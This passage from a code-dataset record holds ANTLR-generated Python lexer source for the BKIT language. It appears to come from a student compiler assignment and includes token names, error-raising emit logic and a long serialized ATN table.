\"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \n \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n 
grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[3] = self.UNCLOSE_STRING_action \n actions[28] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = self.text;\n self.text = y[1:]\n \n \n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.2957708537578583, "alphanum_fraction": 0.5650569796562195, "avg_line_length": 59.24412155151367, "blob_id": "e9f8279689fc702586ef3d08f2bc93a73f9b25c0", "content_id": "577bf2465a157ed7b0af111577386c3e0f3b1892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33340, "license_type": "no_license", "max_line_length": 103, "num_lines": 553, "path": "/Assignments/assignment1/src/forJava/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom 
io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2S\")\n buf.write(\"\\u02ed\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n buf.write(\"U\\4V\\tV\\4W\\tW\\4X\\tX\\4Y\\tY\\4Z\\tZ\\4[\\t[\\4\\\\\\t\\\\\\4]\\t]\\4\")\n buf.write(\"^\\t^\\4_\\t_\\4`\\t`\\4a\\ta\\4b\\tb\\3\\2\\3\\2\\3\\2\\3\\2\\3\\2\\7\\2\\u00cb\")\n buf.write(\"\\n\\2\\f\\2\\16\\2\\u00ce\\13\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\5\\3\\u00db\\n\\3\\3\\4\\3\\4\\5\\4\\u00df\\n\\4\\3\\5\")\n buf.write(\"\\3\\5\\3\\5\\3\\5\\5\\5\\u00e5\\n\\5\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\5\\6\\u00ec\")\n buf.write(\"\\n\\6\\3\\7\\3\\7\\3\\b\\3\\b\\5\\b\\u00f2\\n\\b\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\")\n 
buf.write(\"\\3\\13\\3\\f\\3\\f\\5\\f\\u00fc\\n\\f\\3\\r\\3\\r\\3\\r\\5\\r\\u0101\\n\\r\")\n buf.write(\"\\3\\r\\6\\r\\u0104\\n\\r\\r\\r\\16\\r\\u0105\\3\\16\\3\\16\\7\\16\\u010a\")\n buf.write(\"\\n\\16\\f\\16\\16\\16\\u010d\\13\\16\\3\\17\\6\\17\\u0110\\n\\17\\r\\17\")\n buf.write(\"\\16\\17\\u0111\\3\\17\\3\\17\\5\\17\\u0116\\n\\17\\3\\17\\5\\17\\u0119\")\n buf.write(\"\\n\\17\\3\\20\\3\\20\\3\\20\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\22\\3\\23\")\n buf.write(\"\\3\\23\\3\\23\\5\\23\\u0127\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\3\\26\\3\")\n buf.write(\"\\26\\3\\26\\3\\26\\5\\26\\u0131\\n\\26\\3\\26\\3\\26\\7\\26\\u0135\\n\\26\")\n buf.write(\"\\f\\26\\16\\26\\u0138\\13\\26\\3\\27\\3\\27\\3\\27\\7\\27\\u013d\\n\\27\")\n buf.write(\"\\f\\27\\16\\27\\u0140\\13\\27\\5\\27\\u0142\\n\\27\\3\\30\\3\\30\\3\\30\")\n buf.write(\"\\3\\30\\5\\30\\u0148\\n\\30\\3\\30\\3\\30\\7\\30\\u014c\\n\\30\\f\\30\\16\")\n buf.write(\"\\30\\u014f\\13\\30\\3\\31\\3\\31\\3\\31\\5\\31\\u0154\\n\\31\\3\\32\\3\")\n buf.write(\"\\32\\3\\33\\3\\33\\5\\33\\u015a\\n\\33\\3\\34\\3\\34\\7\\34\\u015e\\n\\34\")\n buf.write(\"\\f\\34\\16\\34\\u0161\\13\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3!\\3!\\3!\\3!\\3\")\n buf.write(\"!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3#\\3#\\3#\\3$\\3$\")\n buf.write(\"\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3\")\n buf.write(\"&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3(\")\n buf.write(\"\\3(\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3\")\n buf.write(\"+\\3+\\3+\\3+\\3,\\3,\\3,\\3,\\3,\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3\")\n buf.write(\".\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\")\n 
buf.write(\"\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\64\")\n buf.write(\"\\3\\64\\3\\65\\3\\65\\3\\65\\3\\66\\3\\66\\3\\67\\3\\67\\3\\67\\38\\38\\3\")\n buf.write(\"9\\39\\39\\3:\\3:\\3;\\3;\\3<\\3<\\3<\\3=\\3=\\3=\\3>\\3>\\3>\\3?\\3?\\3\")\n buf.write(\"?\\3@\\3@\\3A\\3A\\3B\\3B\\3B\\3C\\3C\\3C\\3D\\3D\\3D\\3D\\3E\\3E\\3E\\3\")\n buf.write(\"F\\3F\\3F\\3G\\3G\\3G\\3G\\3H\\3H\\3H\\3H\\3I\\3I\\3J\\3J\\3K\\3K\\3L\\3\")\n buf.write(\"L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\3U\\3\")\n buf.write(\"U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3V\\3V\\3V\\3V\\3V\\3V\\3\")\n buf.write(\"V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3W\\3\")\n buf.write(\"W\\3W\\3W\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3X\\3\")\n buf.write(\"X\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Y\\3Z\\3Z\\3\")\n buf.write(\"Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3Z\\3[\\3[\\3[\\3[\\3[\\3\")\n buf.write(\"[\\3[\\3[\\3[\\3[\\3[\\3[\\3[\\3[\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\")\n buf.write(\"\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3\\\\\\3]\\3]\\3]\\3]\\7]\\u02b8\")\n buf.write(\"\\n]\\f]\\16]\\u02bb\\13]\\3]\\3]\\3]\\3]\\3]\\3^\\6^\\u02c3\\n^\\r^\")\n buf.write(\"\\16^\\u02c4\\3^\\3^\\3_\\3_\\7_\\u02cb\\n_\\f_\\16_\\u02ce\\13_\\3\")\n buf.write(\"_\\3_\\3_\\3`\\3`\\7`\\u02d5\\n`\\f`\\16`\\u02d8\\13`\\3`\\5`\\u02db\")\n buf.write(\"\\n`\\3`\\3`\\3a\\3a\\3a\\3a\\3a\\3a\\7a\\u02e5\\na\\fa\\16a\\u02e8\\13\")\n buf.write(\"a\\3a\\3a\\3b\\3b\\4\\u02b9\\u02e6\\2c\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\")\n buf.write(\"\\b\\17\\t\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2\")\n buf.write(\"%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\n\\63\\13\\65\\f\\67\\r9\\16;\\17=\\20?\")\n buf.write(\"\\21A\\22C\\23E\\24G\\25I\\26K\\27M\\30O\\31Q\\32S\\33U\\34W\\35Y\\36\")\n buf.write(\"[\\37] _!a\\\"c#e$g%i&k\\'m(o)q*s+u,w-y.{/}\\60\\177\\61\\u0081\")\n 
buf.write(\"\\62\\u0083\\63\\u0085\\64\\u0087\\65\\u0089\\66\\u008b\\67\\u008d\")\n buf.write(\"8\\u008f9\\u0091:\\u0093;\\u0095<\\u0097=\\u0099>\\u009b?\\u009d\")\n buf.write(\"@\\u009fA\\u00a1B\\u00a3C\\u00a5D\\u00a7E\\u00a9F\\u00abG\\u00ad\")\n buf.write(\"H\\u00afI\\u00b1J\\u00b3K\\u00b5L\\u00b7M\\u00b9N\\u00bbO\\u00bd\")\n buf.write(\"P\\u00bfQ\\u00c1R\\u00c3S\\3\\2\\22\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2\")\n buf.write(\"GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\4\")\n buf.write(\"\\2\\62;CH\\3\\2\\629\\4\\2\\63;CH\\3\\2\\62\\62\\3\\2\\63;\\3\\2\\639\\5\")\n buf.write(\"\\2\\13\\f\\16\\17\\\"\\\"\\4\\3\\n\\f\\16\\17\\3\\2,,\\2\\u030d\\2\\3\\3\\2\")\n buf.write(\"\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\")\n buf.write(\"\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\")\n buf.write(\"\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\")\n buf.write(\"\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\")\n buf.write(\"\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\")\n buf.write(\"\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2\")\n buf.write(\"[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\")\n buf.write(\"\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\")\n buf.write(\"\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\")\n buf.write(\"\\2\\2\\2y\\3\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\")\n buf.write(\"\\u0081\\3\\2\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\")\n buf.write(\"\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\")\n 
buf.write(\"\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\")\n buf.write(\"\\2\\2\\u009d\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\2\\u00a9\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00ab\\3\\2\\2\\2\\2\\u00ad\\3\\2\\2\\2\\2\\u00af\\3\\2\\2\\2\\2\\u00b1\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00b3\\3\\2\\2\\2\\2\\u00b5\\3\\2\\2\\2\\2\\u00b7\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00b9\\3\\2\\2\\2\\2\\u00bb\\3\\2\\2\\2\\2\\u00bd\\3\\2\\2\\2\\2\\u00bf\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00c1\\3\\2\\2\\2\\2\\u00c3\\3\\2\\2\\2\\3\\u00c5\\3\\2\\2\")\n buf.write(\"\\2\\5\\u00da\\3\\2\\2\\2\\7\\u00de\\3\\2\\2\\2\\t\\u00e4\\3\\2\\2\\2\\13\")\n buf.write(\"\\u00eb\\3\\2\\2\\2\\r\\u00ed\\3\\2\\2\\2\\17\\u00f1\\3\\2\\2\\2\\21\\u00f3\")\n buf.write(\"\\3\\2\\2\\2\\23\\u00f5\\3\\2\\2\\2\\25\\u00f7\\3\\2\\2\\2\\27\\u00fb\\3\")\n buf.write(\"\\2\\2\\2\\31\\u00fd\\3\\2\\2\\2\\33\\u0107\\3\\2\\2\\2\\35\\u010f\\3\\2\")\n buf.write(\"\\2\\2\\37\\u011a\\3\\2\\2\\2!\\u011d\\3\\2\\2\\2#\\u0120\\3\\2\\2\\2%\\u0126\")\n buf.write(\"\\3\\2\\2\\2\\'\\u0128\\3\\2\\2\\2)\\u012a\\3\\2\\2\\2+\\u0130\\3\\2\\2\\2\")\n buf.write(\"-\\u0141\\3\\2\\2\\2/\\u0147\\3\\2\\2\\2\\61\\u0153\\3\\2\\2\\2\\63\\u0155\")\n buf.write(\"\\3\\2\\2\\2\\65\\u0159\\3\\2\\2\\2\\67\\u015b\\3\\2\\2\\29\\u0165\\3\\2\")\n buf.write(\"\\2\\2;\\u016a\\3\\2\\2\\2=\\u0170\\3\\2\\2\\2?\\u0179\\3\\2\\2\\2A\\u017c\")\n buf.write(\"\\3\\2\\2\\2C\\u0181\\3\\2\\2\\2E\\u0188\\3\\2\\2\\2G\\u018e\\3\\2\\2\\2\")\n buf.write(\"I\\u0196\\3\\2\\2\\2K\\u019d\\3\\2\\2\\2M\\u01a6\\3\\2\\2\\2O\\u01aa\\3\")\n buf.write(\"\\2\\2\\2Q\\u01b3\\3\\2\\2\\2S\\u01b6\\3\\2\\2\\2U\\u01c0\\3\\2\\2\\2W\\u01c7\")\n buf.write(\"\\3\\2\\2\\2Y\\u01cc\\3\\2\\2\\2[\\u01d0\\3\\2\\2\\2]\\u01d6\\3\\2\\2\\2\")\n buf.write(\"_\\u01db\\3\\2\\2\\2a\\u01e1\\3\\2\\2\\2c\\u01e7\\3\\2\\2\\2e\\u01e9\\3\")\n 
buf.write(\"\\2\\2\\2g\\u01ec\\3\\2\\2\\2i\\u01ee\\3\\2\\2\\2k\\u01f1\\3\\2\\2\\2m\\u01f3\")\n buf.write(\"\\3\\2\\2\\2o\\u01f6\\3\\2\\2\\2q\\u01f8\\3\\2\\2\\2s\\u01fb\\3\\2\\2\\2\")\n buf.write(\"u\\u01fd\\3\\2\\2\\2w\\u01ff\\3\\2\\2\\2y\\u0202\\3\\2\\2\\2{\\u0205\\3\")\n buf.write(\"\\2\\2\\2}\\u0208\\3\\2\\2\\2\\177\\u020b\\3\\2\\2\\2\\u0081\\u020d\\3\")\n buf.write(\"\\2\\2\\2\\u0083\\u020f\\3\\2\\2\\2\\u0085\\u0212\\3\\2\\2\\2\\u0087\\u0215\")\n buf.write(\"\\3\\2\\2\\2\\u0089\\u0219\\3\\2\\2\\2\\u008b\\u021c\\3\\2\\2\\2\\u008d\")\n buf.write(\"\\u021f\\3\\2\\2\\2\\u008f\\u0223\\3\\2\\2\\2\\u0091\\u0227\\3\\2\\2\\2\")\n buf.write(\"\\u0093\\u0229\\3\\2\\2\\2\\u0095\\u022b\\3\\2\\2\\2\\u0097\\u022d\\3\")\n buf.write(\"\\2\\2\\2\\u0099\\u022f\\3\\2\\2\\2\\u009b\\u0231\\3\\2\\2\\2\\u009d\\u0233\")\n buf.write(\"\\3\\2\\2\\2\\u009f\\u0235\\3\\2\\2\\2\\u00a1\\u0237\\3\\2\\2\\2\\u00a3\")\n buf.write(\"\\u0239\\3\\2\\2\\2\\u00a5\\u023b\\3\\2\\2\\2\\u00a7\\u023d\\3\\2\\2\\2\")\n buf.write(\"\\u00a9\\u023f\\3\\2\\2\\2\\u00ab\\u024c\\3\\2\\2\\2\\u00ad\\u025a\\3\")\n buf.write(\"\\2\\2\\2\\u00af\\u0267\\3\\2\\2\\2\\u00b1\\u0277\\3\\2\\2\\2\\u00b3\\u0286\")\n buf.write(\"\\3\\2\\2\\2\\u00b5\\u0295\\3\\2\\2\\2\\u00b7\\u02a3\\3\\2\\2\\2\\u00b9\")\n buf.write(\"\\u02b3\\3\\2\\2\\2\\u00bb\\u02c2\\3\\2\\2\\2\\u00bd\\u02c8\\3\\2\\2\\2\")\n buf.write(\"\\u00bf\\u02d2\\3\\2\\2\\2\\u00c1\\u02de\\3\\2\\2\\2\\u00c3\\u02eb\\3\")\n buf.write(\"\\2\\2\\2\\u00c5\\u00cc\\5\\21\\t\\2\\u00c6\\u00cb\\5\\21\\t\\2\\u00c7\")\n buf.write(\"\\u00cb\\5\\25\\13\\2\\u00c8\\u00cb\\5\\23\\n\\2\\u00c9\\u00cb\\7a\\2\")\n buf.write(\"\\2\\u00ca\\u00c6\\3\\2\\2\\2\\u00ca\\u00c7\\3\\2\\2\\2\\u00ca\\u00c8\")\n buf.write(\"\\3\\2\\2\\2\\u00ca\\u00c9\\3\\2\\2\\2\\u00cb\\u00ce\\3\\2\\2\\2\\u00cc\")\n buf.write(\"\\u00ca\\3\\2\\2\\2\\u00cc\\u00cd\\3\\2\\2\\2\\u00cd\\4\\3\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00cc\\3\\2\\2\\2\\u00cf\\u00db\\5{>\\2\\u00d0\\u00db\\5}?\\2\\u00d1\")\n 
buf.write(\"\\u00db\\5\\177@\\2\\u00d2\\u00db\\5\\u0081A\\2\\u00d3\\u00db\\5\\u0083\")\n buf.write(\"B\\2\\u00d4\\u00db\\5\\u0085C\\2\\u00d5\\u00db\\5\\u0087D\\2\\u00d6\")\n buf.write(\"\\u00db\\5\\u0089E\\2\\u00d7\\u00db\\5\\u008bF\\2\\u00d8\\u00db\\5\")\n buf.write(\"\\u008dG\\2\\u00d9\\u00db\\5\\u008fH\\2\\u00da\\u00cf\\3\\2\\2\\2\\u00da\")\n buf.write(\"\\u00d0\\3\\2\\2\\2\\u00da\\u00d1\\3\\2\\2\\2\\u00da\\u00d2\\3\\2\\2\\2\")\n buf.write(\"\\u00da\\u00d3\\3\\2\\2\\2\\u00da\\u00d4\\3\\2\\2\\2\\u00da\\u00d5\\3\")\n buf.write(\"\\2\\2\\2\\u00da\\u00d6\\3\\2\\2\\2\\u00da\\u00d7\\3\\2\\2\\2\\u00da\\u00d8\")\n buf.write(\"\\3\\2\\2\\2\\u00da\\u00d9\\3\\2\\2\\2\\u00db\\6\\3\\2\\2\\2\\u00dc\\u00df\")\n buf.write(\"\\5w<\\2\\u00dd\\u00df\\5y=\\2\\u00de\\u00dc\\3\\2\\2\\2\\u00de\\u00dd\")\n buf.write(\"\\3\\2\\2\\2\\u00df\\b\\3\\2\\2\\2\\u00e0\\u00e5\\5e\\63\\2\\u00e1\\u00e5\")\n buf.write(\"\\5c\\62\\2\\u00e2\\u00e5\\5i\\65\\2\\u00e3\\u00e5\\5g\\64\\2\\u00e4\")\n buf.write(\"\\u00e0\\3\\2\\2\\2\\u00e4\\u00e1\\3\\2\\2\\2\\u00e4\\u00e2\\3\\2\\2\\2\")\n buf.write(\"\\u00e4\\u00e3\\3\\2\\2\\2\\u00e5\\n\\3\\2\\2\\2\\u00e6\\u00ec\\5k\\66\")\n buf.write(\"\\2\\u00e7\\u00ec\\5m\\67\\2\\u00e8\\u00ec\\5q9\\2\\u00e9\\u00ec\\5\")\n buf.write(\"o8\\2\\u00ea\\u00ec\\5s:\\2\\u00eb\\u00e6\\3\\2\\2\\2\\u00eb\\u00e7\")\n buf.write(\"\\3\\2\\2\\2\\u00eb\\u00e8\\3\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\\u00eb\")\n buf.write(\"\\u00ea\\3\\2\\2\\2\\u00ec\\f\\3\\2\\2\\2\\u00ed\\u00ee\\5u;\\2\\u00ee\")\n buf.write(\"\\16\\3\\2\\2\\2\\u00ef\\u00f2\\5i\\65\\2\\u00f0\\u00f2\\5g\\64\\2\\u00f1\")\n buf.write(\"\\u00ef\\3\\2\\2\\2\\u00f1\\u00f0\\3\\2\\2\\2\\u00f2\\20\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\u00f4\\t\\2\\2\\2\\u00f4\\22\\3\\2\\2\\2\\u00f5\\u00f6\\t\\3\\2\\2\\u00f6\")\n buf.write(\"\\24\\3\\2\\2\\2\\u00f7\\u00f8\\t\\4\\2\\2\\u00f8\\26\\3\\2\\2\\2\\u00f9\")\n buf.write(\"\\u00fc\\5\\21\\t\\2\\u00fa\\u00fc\\5\\23\\n\\2\\u00fb\\u00f9\\3\\2\\2\")\n 
buf.write(\"\\2\\u00fb\\u00fa\\3\\2\\2\\2\\u00fc\\30\\3\\2\\2\\2\\u00fd\\u0100\\t\")\n buf.write(\"\\5\\2\\2\\u00fe\\u0101\\5g\\64\\2\\u00ff\\u0101\\5c\\62\\2\\u0100\\u00fe\")\n buf.write(\"\\3\\2\\2\\2\\u0100\\u00ff\\3\\2\\2\\2\\u0100\\u0101\\3\\2\\2\\2\\u0101\")\n buf.write(\"\\u0103\\3\\2\\2\\2\\u0102\\u0104\\5\\25\\13\\2\\u0103\\u0102\\3\\2\\2\")\n buf.write(\"\\2\\u0104\\u0105\\3\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0105\\u0106\")\n buf.write(\"\\3\\2\\2\\2\\u0106\\32\\3\\2\\2\\2\\u0107\\u010b\\t\\6\\2\\2\\u0108\\u010a\")\n buf.write(\"\\5\\25\\13\\2\\u0109\\u0108\\3\\2\\2\\2\\u010a\\u010d\\3\\2\\2\\2\\u010b\")\n buf.write(\"\\u0109\\3\\2\\2\\2\\u010b\\u010c\\3\\2\\2\\2\\u010c\\34\\3\\2\\2\\2\\u010d\")\n buf.write(\"\\u010b\\3\\2\\2\\2\\u010e\\u0110\\5\\25\\13\\2\\u010f\\u010e\\3\\2\\2\")\n buf.write(\"\\2\\u0110\\u0111\\3\\2\\2\\2\\u0111\\u010f\\3\\2\\2\\2\\u0111\\u0112\")\n buf.write(\"\\3\\2\\2\\2\\u0112\\u0118\\3\\2\\2\\2\\u0113\\u0115\\5\\33\\16\\2\\u0114\")\n buf.write(\"\\u0116\\5\\31\\r\\2\\u0115\\u0114\\3\\2\\2\\2\\u0115\\u0116\\3\\2\\2\")\n buf.write(\"\\2\\u0116\\u0119\\3\\2\\2\\2\\u0117\\u0119\\5\\31\\r\\2\\u0118\\u0113\")\n buf.write(\"\\3\\2\\2\\2\\u0118\\u0117\\3\\2\\2\\2\\u0119\\36\\3\\2\\2\\2\\u011a\\u011b\")\n buf.write(\"\\7^\\2\\2\\u011b\\u011c\\n\\7\\2\\2\\u011c \\3\\2\\2\\2\\u011d\\u011e\")\n buf.write(\"\\7^\\2\\2\\u011e\\u011f\\t\\7\\2\\2\\u011f\\\"\\3\\2\\2\\2\\u0120\\u0121\")\n buf.write(\"\\7)\\2\\2\\u0121\\u0122\\7$\\2\\2\\u0122$\\3\\2\\2\\2\\u0123\\u0127\")\n buf.write(\"\\n\\b\\2\\2\\u0124\\u0127\\5!\\21\\2\\u0125\\u0127\\5#\\22\\2\\u0126\")\n buf.write(\"\\u0123\\3\\2\\2\\2\\u0126\\u0124\\3\\2\\2\\2\\u0126\\u0125\\3\\2\\2\\2\")\n buf.write(\"\\u0127&\\3\\2\\2\\2\\u0128\\u0129\\t\\t\\2\\2\\u0129(\\3\\2\\2\\2\\u012a\")\n buf.write(\"\\u012b\\t\\n\\2\\2\\u012b*\\3\\2\\2\\2\\u012c\\u012d\\7\\62\\2\\2\\u012d\")\n buf.write(\"\\u0131\\7z\\2\\2\\u012e\\u012f\\7\\62\\2\\2\\u012f\\u0131\\7Z\\2\\2\")\n 
